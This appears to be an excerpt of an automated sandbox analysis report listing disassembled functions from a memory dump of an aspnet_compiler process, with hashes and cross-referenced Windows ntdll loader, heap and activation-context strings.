                                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                                          • Opcode ID: f5efcd11952967aa38a7ecd7be6e792b60aec95ece5377d059fbfcc6f430316d
                                                                                                                                                          • Instruction ID: 7e925b9daab688943475cfcca2bbc7e91e1f635d4be9300b7e151f3c6a235932
                                                                                                                                                          • Opcode Fuzzy Hash: f5efcd11952967aa38a7ecd7be6e792b60aec95ece5377d059fbfcc6f430316d
                                                                                                                                                          • Instruction Fuzzy Hash: 2AC18C74608386CFD791DF58C044BABBBE4BF88704F044AAAF9D58B251E734DA49CB52
                                                                                                                                                          Strings
                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01088422
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01088421
                                                                                                                                                          • @, xrefs: 01088591
                                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0108855E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                                          • Opcode ID: 48615a130e765367b73615e37a144d34bb8becafd9c900537899bada038600b5
                                                                                                                                                          • Instruction ID: 6f3a944d1d4f329f31154f8d393425fcbd8e30a32701695095ba2e9d358bc9ee
                                                                                                                                                          • Opcode Fuzzy Hash: 48615a130e765367b73615e37a144d34bb8becafd9c900537899bada038600b5
                                                                                                                                                          • Instruction Fuzzy Hash: C4918C71608345AFDB21EF65CC50EAFBAE8BF88754F80492EFAC496151E730D944CB62
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010C21DE
                                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010C21D9, 010C22B1
                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010C22B6
                                                                                                                                                          • .Local, xrefs: 010828D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                                          • Opcode ID: 4fe07bd273d955b41c99707ce74e561a6ecc3af0e319988492e9478d667b395d
                                                                                                                                                          • Instruction ID: 24bbb1289189abf1d5224d53458dffe12b8ef381274d07f218841633224043cd
                                                                                                                                                          • Opcode Fuzzy Hash: 4fe07bd273d955b41c99707ce74e561a6ecc3af0e319988492e9478d667b395d
                                                                                                                                                          • Instruction Fuzzy Hash: B9A1DF3590422ADBDB64EF68CC84BA9B3B5BF58714F1541EAD9C8AB351D7309E80CF90
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 010C342A
                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 010C3437
                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 010C3456
                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 010C3425, 010C3432, 010C3451
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                                          • Opcode ID: bca02c4b1d81c019680d8052f692197f0e64ad5e067280db4a8e6954fe7e6465
                                                                                                                                                          • Instruction ID: 1f7a81920bf31c7c6bb5b7a88d00e97e4c300712ecc803e0f5132a706dc0f87e
                                                                                                                                                          • Opcode Fuzzy Hash: bca02c4b1d81c019680d8052f692197f0e64ad5e067280db4a8e6954fe7e6465
                                                                                                                                                          • Instruction Fuzzy Hash: 94611236654B129BD762DF18C841B6AF7E9BF90B10F1485ADE8D5DF241CB30E801CB91
                                                                                                                                                          Strings
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010B106B
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010B10AE
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010B1028
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010B0FE5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                                          • Opcode ID: dc209e9e21e627ab80889d3af2a45815b67ce27af031f3c1a9648ac0c3a5af16
                                                                                                                                                          • Instruction ID: 2f22e4657c60afd6993817ef7de1614fe7b6a37a7ac59f23ae29775a97953a9d
                                                                                                                                                          • Opcode Fuzzy Hash: dc209e9e21e627ab80889d3af2a45815b67ce27af031f3c1a9648ac0c3a5af16
                                                                                                                                                          • Instruction Fuzzy Hash: C271EFB1944306AFCBA1DF14C884B9B7BE8AF94768F804468FDC98B246D735D188CBD1
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 010C3640, 010C366C
                                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 010C3636, 010C3662
                                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 010C365C
                                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010C362F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                          • API String ID: 0-3779518884
                                                                                                                                                          • Opcode ID: ad3530d7318a4a8c2688931d0180b6cdf3ac4b5977f6b0b884e7b7ca87c90836
                                                                                                                                                          • Instruction ID: 2f7f869e90cf1f4d5ececcea0fc0ccc83827212e02c99e081006fb7b11172d13
                                                                                                                                                          • Opcode Fuzzy Hash: ad3530d7318a4a8c2688931d0180b6cdf3ac4b5977f6b0b884e7b7ca87c90836
                                                                                                                                                          • Instruction Fuzzy Hash: D2311B229087139FDF76FF0CC888B697AE4BB01A54F0681AAD5D4DB251D7A09C808795
                                                                                                                                                          Strings
                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010BA992
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010BA9A2
                                                                                                                                                          • apphelp.dll, xrefs: 01072462
                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 010BA998
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-176724104
                                                                                                                                                          • Opcode ID: bd4ad15f2a2334cc6db4f4b28ae82b40689dcc58b06a9db41d48587c3b555a0e
                                                                                                                                                          • Instruction ID: c76cda4b1bac160361a3b0f4f4145623a92f5c8e6892215b740a06580e72457b
                                                                                                                                                          • Opcode Fuzzy Hash: bd4ad15f2a2334cc6db4f4b28ae82b40689dcc58b06a9db41d48587c3b555a0e
                                                                                                                                                          • Instruction Fuzzy Hash: 96312779B00206EBEB399F5DD881AEEB7B4FB84F14F150069E9A16B245DB705881C790
                                                                                                                                                          Strings
                                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0106327D
                                                                                                                                                          • HEAP[%wZ]: , xrefs: 01063255
                                                                                                                                                          • HEAP: , xrefs: 01063264
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                          • API String ID: 0-617086771
                                                                                                                                                          • Opcode ID: d63f14884e07ceee845eca641b9d88171c94a90cf74eb9b8bb1e40bcd91bc6ac
                                                                                                                                                          • Instruction ID: 43ed0ad2a552f59d7859572abde154e01d99d1d8b545d06e2264cd3823f3c41d
                                                                                                                                                          • Opcode Fuzzy Hash: d63f14884e07ceee845eca641b9d88171c94a90cf74eb9b8bb1e40bcd91bc6ac
                                                                                                                                                          • Instruction Fuzzy Hash: F292BC70A04249DFEB25CF68C4407AEBBF5FF48314F1880A9E999AB391D735A945CF90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                          • Opcode ID: c52d53a23c295efa5dea0d7a989f2f4f774080783f77404e2e96309c482b5aa9
                                                                                                                                                          • Instruction ID: 99b3bb48bf3b2bdee96e43e9a38b2c23c023ee714a16e6f57de9a9b91d598d58
                                                                                                                                                          • Opcode Fuzzy Hash: c52d53a23c295efa5dea0d7a989f2f4f774080783f77404e2e96309c482b5aa9
                                                                                                                                                          • Instruction Fuzzy Hash: BFF1AE30A40606DFEB25CF68C894BAEB7F9FF45704F1481A8E5969B385D734E981CB90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $@
                                                                                                                                                          • API String ID: 0-1077428164
                                                                                                                                                          • Opcode ID: 4a080d94742548e1b1457d71da2af77addcec394651132cf44faf27d691112e9
                                                                                                                                                          • Instruction ID: a5f531d858bf25611df551409354fafeef2ec006313b94296066c182e80bf202
                                                                                                                                                          • Opcode Fuzzy Hash: 4a080d94742548e1b1457d71da2af77addcec394651132cf44faf27d691112e9
                                                                                                                                                          • Instruction Fuzzy Hash: A6C2AA71A083419FEB65CF28C884BABBBE5BF88354F04896DF9C987241D735D805CB96
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                                          • Opcode ID: ece5eea1ebb82edea7b459d8492b7886e57d7d6499894752cc5161f6978b11ad
                                                                                                                                                          • Instruction ID: 7421de24fa9f9ba18dd34ce6ff12a80385c9350e44cb0fe623b6bb3ea495b526
                                                                                                                                                          • Opcode Fuzzy Hash: ece5eea1ebb82edea7b459d8492b7886e57d7d6499894752cc5161f6978b11ad
                                                                                                                                                          • Instruction Fuzzy Hash: 51A19B769012299BEF71DF68CD88BEAB7B8EF44700F0141E9E949AB250D7359E84CF50
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 010BA10F
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010BA121
                                                                                                                                                          • LdrpCheckModule, xrefs: 010BA117
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-161242083
                                                                                                                                                          • Opcode ID: 33a0a6b4c54f547c1e2417095d25aaef7e139acef265bd399858f8620bb874b4
                                                                                                                                                          • Instruction ID: c167837b14b90d14b151d5002082e4240344965370fb2f9a8173cc4ac6567e69
                                                                                                                                                          • Opcode Fuzzy Hash: 33a0a6b4c54f547c1e2417095d25aaef7e139acef265bd399858f8620bb874b4
                                                                                                                                                          • Instruction Fuzzy Hash: EA71FC74E0020ADFDB69DF68C980AAEB7F4EB49704F14416DE992EB205E730A981CB54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          • API String ID: 0-1334570610
                                                                                                                                                          • Opcode ID: f03a7946a16965f351c292465b589fbd80cdf8318a50ef8cacaacf866b6203c3
                                                                                                                                                          • Instruction ID: ebad8f3327968b8b96815a25d7ea70b61443fee23eea4735b6c2631e23ccec7c
                                                                                                                                                          • Opcode Fuzzy Hash: f03a7946a16965f351c292465b589fbd80cdf8318a50ef8cacaacf866b6203c3
                                                                                                                                                          • Instruction Fuzzy Hash: 0C618E71641301DFDB69CF28C880BAABBE5FF45704F14C5A9E4998B396D770E881CB91
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010C82E8
                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 010C82D7
                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010C82DE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-1783798831
                                                                                                                                                          • Opcode ID: 4a794fed4ca0d166d8a011b9ea55bfb8424f4bfc565df5f9364c21d4eac6ff5f
                                                                                                                                                          • Instruction ID: e5f3b349a2d14bbd3c8fd511caf1f58bd5572697b76ea1ca651d2eac907b4e2b
                                                                                                                                                          • Opcode Fuzzy Hash: 4a794fed4ca0d166d8a011b9ea55bfb8424f4bfc565df5f9364c21d4eac6ff5f
                                                                                                                                                          • Instruction Fuzzy Hash: 0041FDB5508305ABD724FB68D944B9B77F8BF48A54F00883AF9D8D7290E730D840CBA5
                                                                                                                                                          Strings
                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0110C1C5
                                                                                                                                                          • @, xrefs: 0110C1F1
                                                                                                                                                          • PreferredUILanguages, xrefs: 0110C212
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                          • Opcode ID: 39c01d2753614bc261265d4c7b0f0aa90fc29d491ce80fe79ad06fdc8e37c356
                                                                                                                                                          • Instruction ID: 95f548987849517657a63474326222d10324cdc4cb608b485298db5167fbc48f
                                                                                                                                                          • Opcode Fuzzy Hash: 39c01d2753614bc261265d4c7b0f0aa90fc29d491ce80fe79ad06fdc8e37c356
                                                                                                                                                          • Instruction Fuzzy Hash: B7416471D00209EBDF16DAD8C891BEEB7B9AB14700F1441AAE645B7680D7B49A448F90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                                          • Opcode ID: 33470a75b72f1912bc0f81d9687809a448ab56f0272965f4b9e1c1758f024519
                                                                                                                                                          • Instruction ID: fb9a8c7a9b21dc7ef57d8a812ad11175371ce3c0dcab5312c5f6a1348a712173
                                                                                                                                                          • Opcode Fuzzy Hash: 33470a75b72f1912bc0f81d9687809a448ab56f0272965f4b9e1c1758f024519
                                                                                                                                                          • Instruction Fuzzy Hash: 2941E271A002598FEB25DBDAC858BEDBBF8FFA5340F140499DA81EB781D7349901CB50
                                                                                                                                                          Strings
                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010D4888
                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010D4899
                                                                                                                                                          • LdrpCheckRedirection, xrefs: 010D488F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                          • API String ID: 0-3154609507
                                                                                                                                                          • Opcode ID: 5f20141e87547cb942d4e41f43ab8d1cf6bf522cb6a2674e6a60ced1bff5b0ba
                                                                                                                                                          • Instruction ID: e707f10b6f6b823e81007ee235582e1aa00e91029a556bd2d2a0deb0fbd8e221
                                                                                                                                                          • Opcode Fuzzy Hash: 5f20141e87547cb942d4e41f43ab8d1cf6bf522cb6a2674e6a60ced1bff5b0ba
                                                                                                                                                          • Instruction Fuzzy Hash: 4741AF32A047519FCB61CF6CD841A6A7BE5FF49A90F0605ADEDD9EBA11D730E800CB91
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                                          • Opcode ID: 7ba200ac2f91a94772a1777545abfea4e3d1af9df0502ef31eefb63faa7e8b64
                                                                                                                                                          • Instruction ID: e92a7235596e71770f49ce5449403621f976e0b09f2593d60da5965adba9380b
                                                                                                                                                          • Opcode Fuzzy Hash: 7ba200ac2f91a94772a1777545abfea4e3d1af9df0502ef31eefb63faa7e8b64
                                                                                                                                                          • Instruction Fuzzy Hash: EB11D231355102DFD759CA28CC81BAAB3A8EF41619F1881A9F486CB295DF38DC80C754
                                                                                                                                                          Strings
                                                                                                                                                          • LdrpInitializationFailure, xrefs: 010D20FA
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010D2104
                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 010D20F3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                          • Opcode ID: 7bb0b76c9e14954609ed32eba7b2006841e14074c33b944aefed477efacbbe44
                                                                                                                                                          • Instruction ID: 70a97c71574c2822014c30353472527721f997f49c8f8b5951d17b8e8ff222a0
                                                                                                                                                          • Opcode Fuzzy Hash: 7bb0b76c9e14954609ed32eba7b2006841e14074c33b944aefed477efacbbe44
                                                                                                                                                          • Instruction Fuzzy Hash: 46F0C279640318ABE724E75DDC42FD93BACEB90F54F1000A9FBD0AB685D6B0A940CA91
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: #%u
                                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                                          • Opcode ID: 39d2b1e455c16cbff9841f5876de3de031cd61f7ef04f98108c9dd482d174c9f
                                                                                                                                                          • Instruction ID: 4bcbc331d88ff07406a3ca4534ff3064139de4268eeae2a9057386c4c9bbd82c
                                                                                                                                                          • Opcode Fuzzy Hash: 39d2b1e455c16cbff9841f5876de3de031cd61f7ef04f98108c9dd482d174c9f
                                                                                                                                                          • Instruction Fuzzy Hash: C9715D71A0014A9FDB15DFA8C990BEEB7F8FF18744F144065E945EB251EA34EE01CBA0
                                                                                                                                                          Strings
                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 0105AA13
                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 0105AA25
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                                          • Opcode ID: 95fa5bebb15415ae6c87aa3131078b014c68a8e7e35f7804768fd267ef609ee2
                                                                                                                                                          • Instruction ID: 62e5229123e5db3c28d468d32a8618ddc37fabb98a2fe36ac2e2939e0bba93ca
                                                                                                                                                          • Opcode Fuzzy Hash: 95fa5bebb15415ae6c87aa3131078b014c68a8e7e35f7804768fd267ef609ee2
                                                                                                                                                          • Instruction Fuzzy Hash: C9E16F71B00219EFEFA2CA99C994BEEBBB9BF04310F144666ED81EB251D7349940CB50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: `$`
                                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                          • Instruction ID: 0fea8d3aa519ce3cc8d723bb60565ce72f0213136a792171ba16fd9f13f14c30
                                                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                          • Instruction Fuzzy Hash: 71C1B0312093829BE729CE28D841B6BFFE5AFC4318F084A3DF6968B294D775D505CB41
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                                          • Opcode ID: b3fb4bacf11746b86e1bb4d7d9573968c4deee31379bd64cc248dba8926301cb
                                                                                                                                                          • Instruction ID: 5e9cf4087b3e436848e37c023d62c9075c4ae8366a434e59c8cba5ce8d91d21c
                                                                                                                                                          • Opcode Fuzzy Hash: b3fb4bacf11746b86e1bb4d7d9573968c4deee31379bd64cc248dba8926301cb
                                                                                                                                                          • Instruction Fuzzy Hash: 7E613971E007199FDB14DFA8C940BAEBBB9FB48B00F14816DE689EB291D731A904CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$MUI
                                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                                          • Opcode ID: 412788cbd2c59a4aa4f59ba1a0929eced2c0d66d6c6fb2ac8e08bba29440ed07
                                                                                                                                                          • Instruction ID: 02e0db2df36625d2e724952587230f4e7e0f491342cf5d4bc7bca46a512a4a3a
                                                                                                                                                          • Opcode Fuzzy Hash: 412788cbd2c59a4aa4f59ba1a0929eced2c0d66d6c6fb2ac8e08bba29440ed07
